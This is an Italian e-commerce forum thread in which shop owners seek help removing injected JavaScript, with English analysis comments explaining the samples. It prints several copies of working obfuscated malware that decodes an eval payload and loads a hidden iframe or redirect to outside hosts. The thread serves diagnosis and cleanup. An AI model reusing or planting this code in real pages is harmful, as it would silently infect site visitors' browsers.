
Attacco Hacker no-stop

Inviato: 16/03/2011, 1:08
da jerys1974
ragazzi aiuto!
sto subendo da questa mattina un attacco hacker sul mio sito.
Stanno continuando ad inserire alcuni script sulle pagine index e sui file .js
La cosa che non mi è chiara, è come abbiano fatto ad entrare nel lato admin. Il lato admin è protetto da password htaccess.
È già la seconda volta che cancello tutti gli script e ora, in questo momento, li stanno reinserendo.
Datemi una mano. Come posso individuare il Trojan, perché di Trojan si tratta, sicuramente.

I file che inseriscono sono:
/*
 * Injected script the poster found appended to index pages and .js files, kept
 * exactly as the forum rendered it (a few tokens look mangled by the forum
 * software, see the notes below, and the line wraps are paste artifacts).
 * What it does: hides the strings "eval" and "String.fromCharCode" inside a CSS
 * rule, reads them back from document.styleSheets, turns an array of
 * (character code * t) numbers back into text and evaluates that text.
 * Detection strings taken from this sample: the selector "#va", the declaration
 * "background:url(data:,String.fromCharCode)", the regex /(S[^")]+)/,
 * new Date(2010,11,3,2,21,4) and long runs of "NNN/t,".
 */
// Appends a <style> element holding "<selector> {<declaration>}"; on IE/Windows it
// uses the last stylesheet's addRule() instead of innerHTML. Its only purpose here
// is to plant the two strings above inside a CSS rule.
// (The line break inside the " {" literal below is a paste artifact; the later
// copies of this script in the thread show it on one line.)
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+"
{"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];
if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};
// Carrier rule: "#va" minus its "#" is "va", later wrapped as "e"+"va"+"l"; the
// url(...) text carries "String.fromCharCode".
createCSS("#va","background:url(data:,String.fromCharCode)");
// Scans every stylesheet for the "#va" rule: `my` becomes the text the regex
// /(S[^")]+)/ matches in the rule's cssText (the "String.fromCharCode" token)
// and `iu` the selector without the "#".
// NOTE(review): `r.cssRules` is almost certainly `r[i].cssRules` in the real
// sample; "[i]" is italic markup on this forum and was stripped. The same
// happened to `dkel[i]` at the bottom of the script.
var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r.cssRules||r.rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?
gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}
// Decoding key: the seconds field of a fixed date, so t == 4.
kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();
// Every entry is a character code times t. Divided by 4 (done by review, not by
// running it) the text is a small script that creates a 10x10 hidden iframe on
// <body> whose src is an external ".../stay/out.php?s_id=1" URL; in this sample
// the host decodes to eurox5.biz, useful as a log-search / blocklist indicator.
var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,
404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/
t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,
404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,
448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,
36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,
396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,
364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,
476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,
188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,
484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,
432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,
464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,
276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,
464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392
/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,
400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,
156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,
404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,
164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,
420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,
404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,
412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/
t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];
// `g` is the global object (plain-call `this` outside strict mode), so `ko` is
// window["eval"]; `gh` = eval("String.fromCharCode") is the real function; the
// loop rebuilds the decoded text one character at a time and the last statement
// evaluates it. `aty` is assigned and never used.
var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel);ydxx+=gh(ch);}ko(ydxx);


questo script:

<!-- Second sample from the same site: a one-shot redirect gated on a cookie,
     then the same CSS/eval decoder as the first sample with different variable
     names and a different embedded URL. The stray " ?>" between the two scripts
     suggests the text was spliced into a PHP file right after a closing tag. -->
<script language="JavaScript">
// Runs only while the cookie "udb=1" is absent: rebuilds a URL by shifting every
// character of the literal down by one (a shift-by-1 cipher; by review it yields
// an http:// URL on the bare IPv4 host 75.127.108.174, path /axa/cc/out.php?s_id=1),
// sets the cookie so the visitor is sent there only once, then navigates.
// The loop runs to 44 while the literal has 43 characters, so the last
// charCodeAt() is NaN and appends "\u0000"; the cookie name is a usable indicator.
if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}
</script> ?><script>
// Same staged decoder as the first sample posted above. Stage 1: plant the text
// "String.fromCharCode" and the selector name "va" inside a CSS rule.
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");
if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};
createCSS("#va","background:url(data:,String.fromCharCode)");
// Stage 2: read them back from document.styleSheets: `iv` = the /(S[^")]+)/ match
// of the rule's cssText ("String.fromCharCode"), `ly` = selector without "#" ("va").
// NOTE(review): `r.cssRules` here and `qcid(tofw)` at the bottom were most likely
// `r[i].cssRules` / `qcid(tofw[i])`; "[i]" is italic markup on this forum.
var iv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var ra=r.cssRules||r.rules;for(var ohx=0;ohx<ra.length;ohx++){var rnbr=ra.item?ra.item(ohx):ra[ohx];if(!rnbr.selectorText.match(/#va/))continue;uj=(rnbr.cssText)?rnbr.cssText:rnbr.style.cssText;iv=uj.match(/(S[^")]+)/)[1];ly=rnbr.selectorText.substr(1);};}catch(e){};}
// Stage 3 key: t == 4 (seconds field of a fixed date); each array entry is a
// character code times 4. Decoded by review, the text is the hidden-iframe
// injector again, this time with src on the same IPv4 host as the redirect above,
// path /~axa/cc/out.php?s_id=1.
cr=new Date(2010,11,3,2,21,4);t=cr.getSeconds();
var tofw=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,
336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,
36/t,36/t,472/t,388/t,456/t,
128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,
444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,
400/t,160/t,392/t,400/t,484/t,164/t,
236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,
400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,
404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,
456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,
388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,220/t,212/t,184/t,196/t,200/t,220/t,184/t,196/t,192/t,224/t,184/t,196/t,220/t,208/t,188/t,504/t,
388/t,480/t,388/t,188/t,396/t,396/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,
192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,
420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,
36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,
128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,
404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,
468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,220/t,212/t,184/t,196/t,200/t,220/t,184/t,196/t,192/t,224/t,184/t,196/t,220/t,208/t,188/t,504/t,388/t,
480/t,388/t,188/t,396/t,396/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,
420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,
244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,
244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,
184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,
184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,
392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,
164/t,236/t,52/t,36/t,36/t,500/t];
// Stage 4: `g` is the global object, so qcid == window["e"+"va"+"l"]; phk ==
// String.fromCharCode; the loop rebuilds the text and qcid(htk) evaluates it.
// `tp` is assigned and never used.
var tp="";var g=function(){return this;}();qcid=g["e"+ly+"l"];var htk="";phk=qcid(iv);for(var i=0;i<tofw.length;i++){xby=qcid(tofw);htk+=phk(xby);}qcid(htk);
</script>

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 2:10
da jerys1974
Tengo a precisare che i file_manager.php sono già stati eliminati.

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 3:44
da 06voip
è un exploit "mascherato": qualcuno potrebbe avere l'accesso ftp; prova a cambiare tutte le password in tuo possesso, ripulisci, rendi più sicuro il tuo shop con le contrib che ci sono in giro e gli update 2.2 to 2.3

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 11:11
da jerys1974
Grazie del consiglio Voip,
Io credo di aver ripulito tutto ma... c'è una sorta di antivirus che potrebbe farmi uno scanning del sito? Per ora sto usando quello di google e dice che ora è tutto ok.
Io ho individuato quelle aggiunte ai file perché erano in fondo al file e perché i file manomessi avevano aggiornato la data di modifica, visibile da ftp.
Ora vedrò di cambiare le password di accesso htaccess. Non credo comunque che avessero le password di accesso del server, perché nel server ci sono una ventina di domini ed è stato attaccato solo il mio OScommerce.
È chiaro che il bug o il trojan è dentro.
Nella mia ignoranza ho ripulito tutti i file con gli script che ho postato. Gli altri mi sembrano normali.
I file di testo come WS_FTP.LOG o spiders.txt o tld.txt, error_log, sono attaccabili?

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 11:45
da 06voip
si a pensarci l'accesso ftp è un po' troppo, c'è qualche file bacato.. se non hai un backup sicuramente funzionante procederei con lo scarico dello shop e farei una ricerca di stringhe di testo come t,184 e altre che sono piuttosto insolite per osc, per esempio anche la parola "opera" è insolita per osc.

Per i file di log e txt penso non ci siano problemi per via del fatto che non sono eseguibili dal web server.. per tool di check dello shop al momento non saprei cosa consigliarti.. in giro ce ne sono diversi considera però che quelli free di solito sono per smanettoni e spesso su piattaforma unix e richiedono delle conoscenze tecniche non indifferenti. Puoi sbizzarrirti a trovarli cercando su google con le parole "vulnerability Scanner web application" tra i tanti incontrerai sicuramente Acunetix Web Vulnerability Scanner che ha una versione trial di 30 gg. però lo conosco solo di nome e non saprei dirti.

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 12:48
da jerys1974
ciao,
sto controllando dietro tuo consiglio i file.
Come t,128/ o altri numeri simili, come quelli che ho postato, non ce ne sono.
Come opera ho trovato questo ma sul file categories.php, ma non mi sembra pericoloso.
Te lo posto, poi mi dici che ne pensi?
Grazie

// MaxiDVD Added WYSIWYG HTML Area Box + Admin Function v1.7 - 2.2 MS2 Products Description HTML - Head
// Legitimate contrib code (this is the "Opera" hit the poster found in
// categories.php). The <?php ... ?> parts are expanded server-side; the rest
// runs in the browser and decides whether to load the htmlarea editor.
// Base URL of the htmlarea files: HTTP or HTTPS server depending on the request
// type, plus the admin directory. Assigned without `var`, so it is a global that
// the loaded editor_*.js scripts presumably read (verify in htmlarea/).
_editor_url = "<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_ADMIN; ?>htmlarea/"; // URL to htmlarea files
// IE version taken from appVersion ("... MSIE 6.0; ..."). On browsers without the
// MSIE token split()[1] is undefined, parseFloat() gives NaN and every ">= 5.5"
// test below is false, so the stub editor_generate() is written instead.
var win_ie_ver = parseFloat(navigator.appVersion.split("MSIE")[1]);
// Mac IE, Windows CE and Opera (which, presumably, could carry the MSIE token in
// its user agent) are forced onto the non-editor path.
if (navigator.userAgent.indexOf('Mac') >= 0) { win_ie_ver = 0; }
if (navigator.userAgent.indexOf('Windows CE') >= 0) { win_ie_ver = 0; }
if (navigator.userAgent.indexOf('Opera') >= 0) { win_ie_ver = 0; }
// Basic vs. advanced editor is chosen at PHP level; the "<scr" + "ipt" split keeps
// the HTML parser from closing the enclosing <script> element at the literal tag
// text inside the string.
<?php if (HTML_AREA_WYSIWYG_BASIC_PD == 'Basic'){ ?> if (win_ie_ver >= 5.5) {
document.write('<scr' + 'ipt src="' +_editor_url+ 'editor_basic.js"');
document.write(' language="Javascript1.2"></scr' + 'ipt>');
} else { document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>'); }
<?php } else{ ?> if (win_ie_ver >= 5.5) {
document.write('<scr' + 'ipt src="' +_editor_url+ 'editor_advanced.js"');
document.write(' language="Javascript1.2"></scr' + 'ipt>');
} else { document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>'); }
<?php }?>

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 13:42
da 06voip
è uno script per UltraPics direi che è a posto, se non hai trovato nient'altro di sospetto proverei a caricarlo, se poi riescono ad entrarti ancora o hai una falla o c'è un altro tipo di exploit e lì per risolvere devi andare sulle contrib di sicurezza e gli update..

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 19:50
da evilmonkey93
Anche a me non mi lasciano vivere....non faccio in tempo a ripristinare il db dal backup che dopo 20 minuti già me l'hanno riempito nuovamente....

Re: Attacco Hacker no-stop

Inviato: 18/03/2011, 13:19
da ErMeS80
Stesso problema anche per me !
Ho eliminato la stringa praticamente da tutti i files ma nella home page viene generata ancora; non riesco a capire da dove; mi sembra di aver capito che sia qualcosa legato allo STS

ecco il sorgente generato della home:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="it">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>filtoppa shop</title>
<base href="http://shop.filtoppa.it/">

<!-- start get_javascript(applicationtop2header) //-->
<!-- Review note: the start/end markers are the STS template system's slot for
     javascript collected between application_top.php and the header. A script
     landing in this slot is emitted server-side by PHP running during
     application_top.php or an STS include, not by the template or .js files,
     which would explain why cleaning those files alone did not stop it. -->
<script>
// Same decoder as the first sample in this thread, here rendered unbroken.
// Stage 1: plant "String.fromCharCode" and the selector name "va" in a CSS rule.
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");
// Stage 2: read them back from document.styleSheets: `my` = the /(S[^")]+)/ match
// ("String.fromCharCode"), `iu` = "va". NOTE(review): `r.cssRules` here and
// `ko(dkel)` at the end were most likely `r[i].cssRules` / `ko(dkel[i])`; "[i]"
// is italic markup on this forum and was stripped.
var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r.cssRules||r.rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}
// Stage 3: t == 4 (seconds field of a fixed date); every array entry is a
// character code times 4. Decoded by review, the text creates a hidden 10x10
// iframe on <body> with src on eurox5.biz (".../stay/out.php?s_id=1"), the
// indicator to search access logs and pages for. The line wraps inside the
// array, including one that splits "464" across lines, are paste artifacts.
kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var
dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,4
